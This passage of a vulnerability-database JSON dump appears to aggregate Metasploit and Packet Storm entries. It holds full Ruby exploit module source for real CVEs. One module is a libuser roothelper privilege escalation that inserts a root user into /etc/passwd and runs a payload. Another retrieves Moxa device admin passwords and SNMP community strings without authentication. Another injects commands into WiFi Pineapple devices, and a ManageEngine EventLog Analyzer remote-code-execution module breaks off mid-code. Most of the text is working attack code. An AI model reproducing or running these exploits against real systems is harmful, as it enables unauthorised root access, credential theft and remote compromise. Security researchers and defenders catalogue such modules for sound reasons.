datastore['COMPILE'].eql?('True') \nif has_gcc? \nvprint_good 'gcc is installed' \ncompile = true \nelse \nunless datastore['COMPILE'].eql? 'Auto' \nfail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.' \nend \nend \nend \n \ncompile \nend \n \ndef check \nuserhelper_path = '/usr/sbin/userhelper' \nunless setuid? userhelper_path \nvprint_error \"#{userhelper_path} is not setuid\" \nreturn CheckCode::Safe \nend \nvprint_good \"#{userhelper_path} is setuid\" \n \nunless command_exists? 'script' \nvprint_error \"script is not installed. Exploitation will fail.\" \nreturn CheckCode::Safe \nend \nvprint_good 'script is installed' \n \nif cmd_exec('lsattr /etc/passwd').include? 'i' \nvprint_error 'File /etc/passwd is immutable' \nreturn CheckCode::Safe \nend \nvprint_good 'File /etc/passwd is not immutable' \n \nglibc_banner = cmd_exec 'ldd --version' \nglibc_version = Gem::Version.new glibc_banner.scan(/^ldd\\s+\\(.*\\)\\s+([\\d\\.]+)/).flatten.first \nif glibc_version.to_s.eql? '' \nvprint_error 'Could not determine the GNU C library version' \nreturn CheckCode::Detected \nend \n \n# roothelper.c requires functions only available since glibc 2.6+ \nif glibc_version < Gem::Version.new('2.6') \nvprint_error \"GNU C Library version #{glibc_version} is not supported\" \nreturn CheckCode::Safe \nend \nvprint_good \"GNU C Library version #{glibc_version} is supported\" \n \nCheckCode::Detected \nend \n \ndef exploit \nif check == CheckCode::Safe \nfail_with Failure::NotVulnerable, 'Target is not vulnerable' \nend \n \nif is_root? \nfail_with Failure::BadConfig, 'Session already has root privileges' \nend \n \nunless cmd_exec(\"test -w '#{base_dir}' && echo true\").include? 'true' \nfail_with Failure::BadConfig, \"#{base_dir} is not writable\" \nend \n \nexecutable_name = \".#{rand_text_alphanumeric rand(5..10)}\" \nexecutable_path = \"#{base_dir}/#{executable_name}\" \n \nif live_compile? \nvprint_status 'Live compiling exploit on system...' \n \n# Upload Qualys' roothelper.c exploit: \n# - https://www.exploit-db.com/exploits/37706/ \npath = ::File.join Msf::Config.data_directory, 'exploits', 'roothelper', 'roothelper.c' \nfd = ::File.open path, 'rb' \nc_code = fd.read fd.stat.size \nfd.close \nupload \"#{executable_path}.c\", c_code \noutput = cmd_exec \"gcc -o #{executable_path} #{executable_path}.c\" \n \nunless output.blank? \nprint_error output \nfail_with Failure::Unknown, \"#{executable_path}.c failed to compile\" \nend \n \ncmd_exec \"chmod +x #{executable_path}\" \nregister_file_for_cleanup executable_path \nelse \nvprint_status 'Dropping pre-compiled exploit on system...' \n \n# Cross-compiled with: \n# - i486-linux-musl-gcc -o roothelper -static -pie roothelper.c \npath = ::File.join Msf::Config.data_directory, 'exploits', 'roothelper', 'roothelper' \nfd = ::File.open path, 'rb' \nexecutable_data = fd.read fd.stat.size \nfd.close \nupload_and_chmodx executable_path, executable_data \nend \n \n# Run roothelper \ntimeout = 180 \nprint_status \"Launching roothelper exploit (Timeout: #{timeout})...\" \noutput = cmd_exec \"echo #{password.gsub(/'/, \"\\\\\\\\'\")} | #{executable_path}\", nil, timeout \noutput.each_line { |line| vprint_status line.chomp } \n \nif output =~ %r{Creating a backup copy of \"/etc/passwd\" named \"(.*)\"} \nregister_file_for_cleanup $1 \nend \n \nif output =~ /died in parent: .*.c:517: forkstop_userhelper/ \nfail_with Failure::NoAccess, 'Incorrect password' \nend \n \n@username = nil \n \nif output =~ /Exploit successful, run \"su ([a-z])\" to become root/ \n@username = $1 \nend \n \nif @username.blank? \nfail_with Failure::Unknown, 'Something went wrong' \nend \n \nprint_good \"Success! User '#{@username}' added to /etc/passwd\" \n \n# Upload payload executable \npayload_path = \"#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}\" \nupload_and_chmodx payload_path, generate_payload_exe \n \n# Execute payload executable \nvprint_status 'Executing payload...' \ncmd_exec \"script -c \\\"su - #{@username} -c #{payload_path}\\\" | sh & echo \" \nregister_file_for_cleanup 'typescript' \nend \n \n# \n# Remove new user from /etc/passwd \n# \ndef on_new_session(session) \nnew_user_removed = false \n \nif session.type.to_s.eql? 'meterpreter' \nsession.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi' \n \n# Remove new user \nsession.sys.process.execute '/bin/sh', \"-c \\\"sed -i 's/^#{@username}:.*$//g' /etc/passwd\\\"\" \n \n# Wait for clean up \nRex.sleep 5 \n \n# Check for new user in /etc/passwd \npasswd_contents = session.fs.file.open('/etc/passwd').read.to_s \nunless passwd_contents =~ /^#{@username}:/ \nnew_user_removed = true \nend \nelsif session.type.to_s.eql? 'shell' \n# Remove new user \nsession.shell_command_token \"sed -i 's/^#{@username}:.*$//g' /etc/passwd\" \n \n# Check for new user in /etc/passwd \npasswd_user = session.shell_command_token \"grep '#{@username}:' /etc/passwd\" \nunless passwd_user =~ /^#{@username}:/ \nnew_user_removed = true \nend \nend \n \nunless new_user_removed \nprint_warning \"Could not remove user '#{@username}' from /etc/passwd\" \nend \nrescue => e \nprint_error \"Error during cleanup: #{e.message}\" \nensure \nsuper \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/147599/libuser_roothelper_priv_esc.rb.txt"}], "metasploit": [{"lastseen": "2019-12-02T22:52:06", "bulletinFamily": "exploit", "description": "This module attempts to gain root privileges on Red Hat based Linux systems, including RHEL, Fedora and CentOS, by exploiting a newline injection vulnerability in libuser and userhelper versions prior to 0.56.13-8 and version 0.60 before 0.60-7. This module makes use of the roothelper.c exploit from Qualys to insert a new user with UID=0 in /etc/passwd. Note, the password for the current user is required by userhelper. Note, on some systems, such as Fedora 11, the user entry for the current user in /etc/passwd will become corrupted and exploitation will fail. This module has been tested successfully on libuser packaged versions 0.56.13-4.el6 on CentOS 6.0 (x86_64); 0.56.13-5.el6 on CentOS 6.5 (x86_64); 0.60-5.el7 on CentOS 7.1-1503 (x86_64); 0.56.16-1.fc13 on Fedora 13 (i686); 0.59-1.fc19 on Fedora Desktop 19 (x86_64); 0.60-3.fc20 on Fedora Desktop 20 (x86_64); 0.60-6.fc21 on Fedora Desktop 21 (x86_64); 0.60-6.fc22 on Fedora Desktop 22 (x86_64); 0.56.13-5.el6 on Red Hat 6.6 (x86_64); and 0.60-5.el7 on Red Hat 7.0 (x86_64). RHEL 5 is vulnerable, however the installed version of glibc (2.5) is missing various functions required by roothelper.c.\n", "modified": "2019-01-10T19:19:14", "published": "2018-04-23T17:49:11", "id": "MSF:EXPLOIT/LINUX/LOCAL/LIBUSER_ROOTHELPER_PRIV_ESC", "href": "", "type": "metasploit", "title": "Libuser roothelper Privilege Escalation", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GreatRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Libuser roothelper Privilege Escalation',\n 'Description' => %q{\n This module attempts to gain root privileges on Red Hat based Linux\n systems, including RHEL, Fedora and CentOS, by exploiting a newline\n injection vulnerability in libuser and userhelper versions prior to\n 0.56.13-8 and version 0.60 before 0.60-7.\n\n This module makes use of the roothelper.c exploit from Qualys to\n insert a new user with UID=0 in /etc/passwd.\n\n Note, the password for the current user is required by userhelper.\n\n Note, on some systems, such as Fedora 11, the user entry for the\n current user in /etc/passwd will become corrupted and exploitation\n will fail.\n\n This module has been tested successfully on libuser packaged versions\n 0.56.13-4.el6 on CentOS 6.0 (x86_64);\n 0.56.13-5.el6 on CentOS 6.5 (x86_64);\n 0.60-5.el7 on CentOS 7.1-1503 (x86_64);\n 0.56.16-1.fc13 on Fedora 13 (i686);\n 0.59-1.fc19 on Fedora Desktop 19 (x86_64);\n 0.60-3.fc20 on Fedora Desktop 20 (x86_64);\n 0.60-6.fc21 on Fedora Desktop 21 (x86_64);\n 0.60-6.fc22 on Fedora Desktop 22 (x86_64);\n 0.56.13-5.el6 on Red Hat 6.6 (x86_64); and\n 0.60-5.el7 on Red Hat 7.0 (x86_64).\n\n RHEL 5 is vulnerable, however the installed version of glibc (2.5)\n is missing various functions required by roothelper.c.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Qualys', # Discovery and C exploit\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => 'Jul 24 2015',\n 'Platform' => [ 'linux' ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Targets' => [[ 'Auto', {} ]],\n 'Privileged' => true,\n 'References' =>\n [\n [ 'EDB', '37706' ],\n [ 'CVE', '2015-3245' ],\n [ 'CVE', '2015-3246' ],\n [ 'BID', '76021' ],\n [ 'BID', '76022' ],\n [ 'URL', 'https://seclists.org/oss-sec/2015/q3/185' ],\n [ 'URL', 'https://access.redhat.com/articles/1537873' ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' =>\n {\n 'AKA' => ['roothelper.c']\n }\n ))\n register_options [\n OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),\n OptString.new('PASSWORD', [ true, 'Password for the current user', '' ])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [ false, 'Override check result', false ]),\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\n ]\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def password\n datastore['PASSWORD'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n cmd_exec \"chmod +x '#{path}'\"\n end\n\n def live_compile?\n compile = false\n\n if datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')\n if has_gcc?\n vprint_good 'gcc is installed'\n compile = true\n else\n unless datastore['COMPILE'].eql? 'Auto'\n fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'\n end\n end\n end\n\n compile\n end\n\n def check\n userhelper_path = '/usr/sbin/userhelper'\n unless setuid? userhelper_path\n vprint_error \"#{userhelper_path} is not setuid\"\n return CheckCode::Safe\n end\n vprint_good \"#{userhelper_path} is setuid\"\n\n unless command_exists? 'script'\n vprint_error \"script is not installed. Exploitation will fail.\"\n return CheckCode::Safe\n end\n vprint_good 'script is installed'\n\n if cmd_exec('lsattr /etc/passwd').include? 'i'\n vprint_error 'File /etc/passwd is immutable'\n return CheckCode::Safe\n end\n vprint_good 'File /etc/passwd is not immutable'\n\n glibc_banner = cmd_exec 'ldd --version'\n glibc_version = Gem::Version.new glibc_banner.scan(/^ldd\\s+\\(.*\\)\\s+([\\d\\.]+)/).flatten.first\n if glibc_version.to_s.eql? ''\n vprint_error 'Could not determine the GNU C library version'\n return CheckCode::Detected\n end\n\n # roothelper.c requires functions only available since glibc 2.6+\n if glibc_version < Gem::Version.new('2.6')\n vprint_error \"GNU C Library version #{glibc_version} is not supported\"\n return CheckCode::Safe\n end\n vprint_good \"GNU C Library version #{glibc_version} is supported\"\n\n CheckCode::Detected\n end\n\n def exploit\n if check == CheckCode::Safe\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n executable_name = \".#{rand_text_alphanumeric rand(5..10)}\"\n executable_path = \"#{base_dir}/#{executable_name}\"\n\n if live_compile?\n vprint_status 'Live compiling exploit on system...'\n\n # Upload Qualys' roothelper.c exploit:\n # - https://www.exploit-db.com/exploits/37706/\n path = ::File.join Msf::Config.data_directory, 'exploits', 'roothelper', 'roothelper.c'\n fd = ::File.open path, 'rb'\n c_code = fd.read fd.stat.size\n fd.close\n upload \"#{executable_path}.c\", c_code\n output = cmd_exec \"gcc -o #{executable_path} #{executable_path}.c\"\n\n unless output.blank?\n print_error output\n fail_with Failure::Unknown, \"#{executable_path}.c failed to compile\"\n end\n\n cmd_exec \"chmod +x #{executable_path}\"\n register_file_for_cleanup executable_path\n else\n vprint_status 'Dropping pre-compiled exploit on system...'\n\n # Cross-compiled with:\n # - i486-linux-musl-gcc -o roothelper -static -pie roothelper.c\n path = ::File.join Msf::Config.data_directory, 'exploits', 'roothelper', 'roothelper'\n fd = ::File.open path, 'rb'\n executable_data = fd.read fd.stat.size\n fd.close\n upload_and_chmodx executable_path, executable_data\n end\n\n # Run roothelper\n timeout = 180\n print_status \"Launching roothelper exploit (Timeout: #{timeout})...\"\n output = cmd_exec \"echo #{password.gsub(/'/, \"\\\\\\\\'\")} | #{executable_path}\", nil, timeout\n output.each_line { |line| vprint_status line.chomp }\n\n if output =~ %r{Creating a backup copy of \"/etc/passwd\" named \"(.*)\"}\n register_file_for_cleanup $1\n end\n\n if output =~ /died in parent: .*.c:517: forkstop_userhelper/\n fail_with Failure::NoAccess, 'Incorrect password'\n end\n\n @username = nil\n\n if output =~ /Exploit successful, run \"su ([a-z])\" to become root/\n @username = $1\n end\n\n if @username.blank?\n fail_with Failure::Unknown, 'Something went wrong'\n end\n\n print_good \"Success! User '#{@username}' added to /etc/passwd\"\n\n # Upload payload executable\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n # Execute payload executable\n vprint_status 'Executing payload...'\n cmd_exec \"script -c \\\"su - #{@username} -c #{payload_path}\\\" | sh & echo \"\n register_file_for_cleanup 'typescript'\n end\n\n #\n # Remove new user from /etc/passwd\n #\n def on_new_session(session)\n new_user_removed = false\n\n if session.type.to_s.eql? 'meterpreter'\n session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'\n\n # Remove new user\n session.sys.process.execute '/bin/sh', \"-c \\\"sed -i 's/^#{@username}:.*$//g' /etc/passwd\\\"\"\n\n # Wait for clean up\n Rex.sleep 5\n\n # Check for new user in /etc/passwd\n passwd_contents = session.fs.file.open('/etc/passwd').read.to_s\n unless passwd_contents =~ /^#{@username}:/\n new_user_removed = true\n end\n elsif session.type.to_s.eql? 'shell'\n # Remove new user\n session.shell_command_token \"sed -i 's/^#{@username}:.*$//g' /etc/passwd\"\n\n # Check for new user in /etc/passwd\n passwd_user = session.shell_command_token \"grep '#{@username}:' /etc/passwd\"\n unless passwd_user =~ /^#{@username}:/\n new_user_removed = true\n end\n end\n\n unless new_user_removed\n print_warning \"Could not remove user '#{@username}' from /etc/passwd\"\n end\n rescue => e\n print_error \"Error during cleanup: #{e.message}\"\n ensure\n super\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/libuser_roothelper_priv_esc.rb"}, {"lastseen": "2019-12-07T15:05:29", "bulletinFamily": "exploit", "description": "The Moxa protocol listens on 4800/UDP and will respond to broadcast or direct traffic. The service is known to be used on Moxa devices in the NPort, OnCell, and MGate product lines. Many devices with firmware versions older than 2017 or late 2016 allow admin credentials and SNMP read and read/write community strings to be retrieved without authentication. This module is the work of Patrick DeSantis of Cisco Talos and K. Reid Wightman. Tested on: Moxa NPort 6250 firmware v1.13, MGate MB3170 firmware 2.5, and NPort 5110 firmware 2.6.\n", "modified": "2018-10-10T21:56:17", "published": "2017-05-16T14:21:44", "id": "MSF:AUXILIARY/ADMIN/SCADA/MOXA_CREDENTIALS_RECOVERY", "href": "", "type": "metasploit", "title": "Moxa Device Credential Retrieval", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Udp\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Moxa Device Credential Retrieval',\n 'Description' => %q{\n The Moxa protocol listens on 4800/UDP and will respond to broadcast\n or direct traffic. The service is known to be used on Moxa devices\n in the NPort, OnCell, and MGate product lines. Many devices with\n firmware versions older than 2017 or late 2016 allow admin credentials\n and SNMP read and read/write community strings to be retrieved without\n authentication.\n\n This module is the work of Patrick DeSantis of Cisco Talos and K. Reid\n Wightman.\n\n Tested on: Moxa NPort 6250 firmware v1.13, MGate MB3170 firmware 2.5,\n and NPort 5110 firmware 2.6.\n\n },\n 'Author' =>\n [\n 'Patrick DeSantis <p[at]t-r10t.com>',\n 'K. Reid Wightman <reid[at]revics-security.com>'\n ],\n\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2016-9361'],\n [ 'BID', '85965'],\n [ 'URL', 'https://www.digitalbond.com/blog/2016/10/25/serial-killers/'],\n [ 'URL', 'https://github.com/reidmefirst/MoxaPass/blob/master/moxa_getpass.py' ],\n [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-336-02']\n ],\n 'DisclosureDate' => 'Jul 28 2015'))\n\n register_options([\n # Moxa protocol listens on 4800/UDP by default\n Opt::RPORT(4800),\n OptEnum.new(\"FUNCTION\", [true, \"Pull credentials or enumerate all function codes\", \"CREDS\",\n [\n \"CREDS\",\n \"ENUM\"\n ]])\n ])\n end\n\n def fc() {\n # Function codes\n 'ident' => \"\\x01\", # identify device\n 'name' => \"\\x10\", # get the \"server name\" of the device\n 'netstat' => \"\\x14\", # network activity of the device\n 'unlock1' => \"\\x16\", # \"unlock\" some devices, including 5110, MGate\n 'date_time' => \"\\x1a\", # get the device date and time\n 'time_server' => \"\\x1b\", # get the time server of device\n 'unlock2' => \"\\x1e\", # \"unlock\" 6xxx series devices\n 'snmp_read' => \"\\x28\", # snmp community strings\n 'pass' => \"\\x29\", # admin password of some devices\n 'all_creds' => \"\\x2c\", # snmp comm strings and admin password of 6xxx\n 'enum' => \"enum\" # mock fc to catch \"ENUM\" option\n }\n end\n\n def send_datagram(func, tail)\n if fc[func] == \"\\x01\"\n # identify datagrams have a length of 8 bytes and no tail\n datagram = fc[func] + \"\\x00\\x00\\x08\\x00\\x00\\x00\\x00\"\n begin\n udp_sock.put(datagram)\n response = udp_sock.get(3)\n rescue ::Timeout::Error\n end\n format_output(response)\n # the last 16 bytes of the ident response are used as a form of auth for\n # function codes other than 0x01\n tail = response[8..24]\n elsif fc[func] == \"enum\"\n for i in (\"\\x02\"..\"\\x80\") do\n # start at 2 since 0 is invalid and 1 is ident\n datagram = i + \"\\x00\\x00\\x14\\x00\\x00\\x00\\x00\" + tail\n begin\n udp_sock.put(datagram)\n response = udp_sock.get(3)\n end\n if response[1] != \"\\x04\"\n vprint_status(\"Function Code: #{Rex::Text.to_hex_dump(datagram[0])}\")\n format_output(response)\n end\n end\n else\n # all non-ident datagrams have a len of 14 bytes and include a tail that\n # is comprised of bytes obtained during the ident\n datagram = fc[func] + \"\\x00\\x00\\x14\\x00\\x00\\x00\\x00\" + tail\n begin\n udp_sock.put(datagram)\n response = udp_sock.get(3)\n if valid_resp(fc[func], response) == -1\n # invalid response, so don't bother trying to parse it\n return\n end\n if fc[func] == \"\\x2c\"\n # try this, note it may fail\n get_creds(response)\n end\n if fc[func] == \"\\x29\"\n # try this, note it may fail\n get_pass(response)\n end\n if fc[func] == \"\\x28\"\n # try this, note it may fail\n get_snmp_read(response)\n end\n rescue ::Timeout::Error\n end\n format_output(response)\n end\n end\n\n # helper function for extracting strings from payload\n def get_string(data)\n str_end = data.index(\"\\x00\")\n return data[0..str_end]\n end\n\n # helper function for extracting password from 0x29 FC response\n def get_pass(response)\n if response.length() < 200\n print_error(\"get_pass failed: response not long enough\")\n return\n end\n pass = get_string(response[200..-1])\n print_good(\"password retrieved: #{pass}\")\n store_loot(\"moxa.get_pass.admin_pass\", \"text/plain\", rhost, pass)\n return pass\n end\n\n # helper function for extracting snmp community from 0x28 FC response\n def get_snmp_read(response)\n if response.length() < 24\n print_error(\"get_snmp_read failed: response not long enough\")\n return\n end\n snmp_string = get_string(response[24..-1])\n print_good(\"snmp community retrieved: #{snmp_string}\")\n store_loot(\"moxa.get_pass.snmp_read\", \"text/plain\", rhost, snmp_string)\n end\n\n # helper function for extracting snmp community from 0x2C FC response\n def get_snmp_write(response)\n if response.length() < 64\n print_error(\"get_snmp_write failed: response not long enough\")\n return\n end\n snmp_string = get_string(response[64..-1])\n print_good(\"snmp read/write community retrieved: #{snmp_string}\")\n store_loot(\"moxa.get_pass.snmp_write\", \"text/plain\", rhost, snmp_string)\n end\n\n # helper function for extracting snmp and pass from 0x2C FC response\n # Note that 0x2C response is basically 0x28 and 0x29 mashed together\n def get_creds(response)\n if response.length() < 200\n # attempt failed. device may not be unlocked\n print_error(\"get_creds failed: response not long enough. Will fall back to other functions\")\n return -1\n end\n get_snmp_read(response)\n get_snmp_write(response)\n get_pass(response)\n end\n\n # helper function to verify that the response was actually for our request\n # Simply makes sure the response function code has most significant bit\n # of the request number set\n # returns 0 if everything is ok\n # returns -1 if functions don't match\n def valid_resp(func, resp)\n # get the query function code to an integer\n qfc = func.unpack(\"C\")[0]\n # make the response function code an integer\n rfc = resp[0].unpack(\"C\")[0]\n if rfc == (qfc + 0x80)\n return 0\n else\n return -1\n end\n end\n\n def format_output(resp)\n # output response bytes as hexdump\n vprint_status(\"Response:\\n#{Rex::Text.to_hex_dump(resp)}\")\n end\n def check\n connect_udp\n\n begin\n # send the identify command\n udp_sock.put(\"\\x01\\x00\\x00\\x08\\x00\\x00\\x00\\x00\")\n response = udp_sock.get(3)\n end\n\n if response\n # A valid response is 24 bytes, starts with 0x81, and contains the values\n # 0x00, 0x90, 0xe8 (the Moxa OIU) in bytes 14, 15, and 16.\n if response[0] == \"\\x81\" && response[14..16] == \"\\x00\\x90\\xe8\" && response.length == 24\n format_output(response)\n return Exploit::CheckCode::Appears\n end\n else\n vprint_error(\"Unknown response\")\n return Exploit::CheckCode::Unknown\n end\n cleanup\n\n Exploit::CheckCode::Safe\n end\n\n def run\n unless check == Exploit::CheckCode::Appears\n print_error(\"Aborted because the target does not seem vulnerable.\")\n return\n end\n\n function = datastore[\"FUNCTION\"]\n\n connect_udp\n\n # identify the device and get bytes for the \"tail\"\n tail = send_datagram('ident', nil)\n\n # get the \"server name\" from the device\n send_datagram('name', tail)\n\n # \"unlock\" the device\n # We send both versions of the unlock FC, this doesn't seem\n # to hurt anything on any devices tested\n send_datagram('unlock1', tail)\n send_datagram('unlock2', tail)\n\n if function == \"CREDS\"\n # grab data\n send_datagram('all_creds', tail)\n send_datagram('snmp_read', tail)\n send_datagram('pass', tail)\n elsif function == \"ENUM\"\n send_datagram('enum', tail)\n else\n print_error(\"Invalid FUNCTION\")\n end\n\n disconnect_udp\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/scada/moxa_credentials_recovery.rb"}, {"lastseen": "2019-12-02T22:54:21", "bulletinFamily": "exploit", "description": "This module exploits a login/csrf check bypass vulnerability on WiFi Pineapples version 2.0 <= pineapple < 2.4. These devices may typically be identified by their SSID beacons of 'Pineapple5_....'; Provided as part of the TospoVirus workshop at DEFCON23.\n", "modified": "2018-07-12T22:34:52", "published": "2016-09-07T00:22:25", "id": "MSF:EXPLOIT/LINUX/HTTP/PINEAPPLE_BYPASS_CMDINJECT", "href": "", "type": "metasploit", "title": "Hak5 WiFi Pineapple Preconfiguration Command Injection", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Hak5 WiFi Pineapple Preconfiguration Command Injection',\n 'Description' => %q{\n This module exploits a login/csrf check bypass vulnerability on WiFi Pineapples version 2.0 <= pineapple < 2.4.\n These devices may typically be identified by their SSID beacons of 'Pineapple5_....';\n Provided as part of the TospoVirus workshop at DEFCON23.\n },\n 'Author' => ['catatonicprime'],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2015-4624' ]\n ],\n 'Platform' => ['unix'],\n 'Arch' => ARCH_CMD,\n 'Privileged' => false,\n 'Payload' => {\n 'Space' => 2048,\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic python netcat telnet'\n }\n },\n 'Targets' =>\n [\n [ 'WiFi Pineapple 2.0.0 - 2.3.0', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Aug 1 2015'))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, 'Path to the command injection', '/components/system/configuration/functions.php' ]),\n Opt::RPORT(1471),\n Opt::RHOST('172.16.42.1')\n ]\n )\n\n deregister_options(\n 'ContextInformationFile',\n 'DOMAIN',\n 'DigestAuthIIS',\n 'EnableContextEncoding',\n 'FingerprintCheck',\n 'HttpClientTimeout',\n 'NTLM::SendLM',\n 'NTLM::SendNTLM',\n 'NTLM::SendSPN',\n 'NTLM::UseLMKey',\n 'NTLM::UseNTLM2_session',\n 'NTLM::UseNTLMv2',\n 'SSL',\n 'SSLVersion',\n 'VERBOSE',\n 'WORKSPACE',\n 'WfsDelay',\n 'Proxies',\n 'VHOST'\n )\n end\n\n def cmd_uri\n normalize_uri('includes', 'css', 'styles.php', '../../..', target_uri.path)\n end\n\n def cmd_inject(cmd)\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => cmd_uri,\n 'vars_get' => {\n 'execute' => \"\" # Presence triggers command execution\n },\n 'vars_post' => {\n 'commands' => cmd\n })\n res\n end\n\n def check\n res = cmd_inject(\"echo\")\n if res && res.code == 200 && res.body =~ /Executing/\n return Exploit::CheckCode::Vulnerable\n end\n Exploit::CheckCode::Safe\n end\n\n def exploit\n print_status('Attempting to bypass login/csrf checks...')\n unless check\n fail_with(Failure::NoAccess, 'Failed to bypass login/csrf check...')\n end\n print_status('Executing payload...')\n cmd_inject(\"#{payload.encoded}\")\n end\nend\n", "cvss": {"score": 4.3, "vector": "AV:A/AC:H/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/pineapple_bypass_cmdinject.rb"}, {"lastseen": "2019-11-22T10:46:44", "bulletinFamily": "exploit", "description": "This module exploits a SQL query functionality in ManageEngine EventLog Analyzer v10.6 build 10060 and previous versions. Every authenticated user, including the default \"guest\" account can execute SQL queries directly on the underlying Postgres database server. The queries are executed as the \"postgres\" user which has full privileges and thus is able to write files to disk. This way a JSP payload can be uploaded and executed with SYSTEM privileges on the web server. This module has been tested successfully on ManageEngine EventLog Analyzer 10.0 (build 10003) over Windows 7 SP1.\n", "modified": "2018-09-15T23:54:45", "published": "2015-09-15T00:29:16", "id": "MSF:EXPLOIT/WINDOWS/MISC/MANAGEENGINE_EVENTLOG_ANALYZER_RCE", "href": "", "type": "metasploit", "title": "ManageEngine EventLog Analyzer Remote Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Powershell\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'ManageEngine EventLog Analyzer Remote Code Execution',\n 'Description' => %q{\n This module exploits a SQL query functionality in ManageEngine EventLog Analyzer v10.6\n build 10060 and previous versions. Every authenticated user, including the default \"guest\"\n account can execute SQL queries directly on the underlying Postgres database server. The\n queries are executed as the \"postgres\" user which has full privileges and thus is able to\n write files to disk. This way a JSP payload can be uploaded and executed with SYSTEM\n privileges on the web server. This module has been tested successfully on ManageEngine\n EventLog Analyzer 10.0 (build 10003) over Windows 7 SP1.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'xistence <xistence[at]0x90.nl>' # Discovery, Metasploit module\n ],\n 'References' =>\n [\n ['EDB', '38173'],\n ['CVE', '2015-7387'],\n ['URL', 'https://seclists.org/fulldisclosure/2015/Sep/59']\n ],\n 'Platform' => ['win'],\n 'Arch' => ARCH_X86,\n 'Targets' =>\n [\n ['ManageEngine EventLog Analyzer 10.0 (build 10003) / Windows 7 SP1', {}]\n ],\n 'Privileged' => true,\n 'DisclosureDate' => 'Jul 11 2015',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(8400),\n OptString.new('USERNAME', [ true, 'The username to authenticate as', 'guest' ]),\n OptString.new('PASSWORD', [ true, 'The password to authenticate as', 'guest' ])\n ])\n end\n\n def uri\n target_uri.path\n end\n\n\n def check\n # Check version\n vprint_status(\"Trying to detect ManageEngine EventLog Analyzer\")\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(uri, 'event', 'index3.do')\n })\n\n if res && res.code == 200 && res.body && res.body.include?('ManageEngine EventLog Analyzer')\n return Exploit::CheckCode::Detected\n else\n return Exploit::CheckCode::Safe\n end\n end\n\n def sql_query(cookies, query)\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(uri, 'event', 'runQuery.do'),\n 'cookie' => cookies,\n 'vars_post' => {\n 'execute' => 'true',\n 'query' => query,\n }\n })\n\n unless res 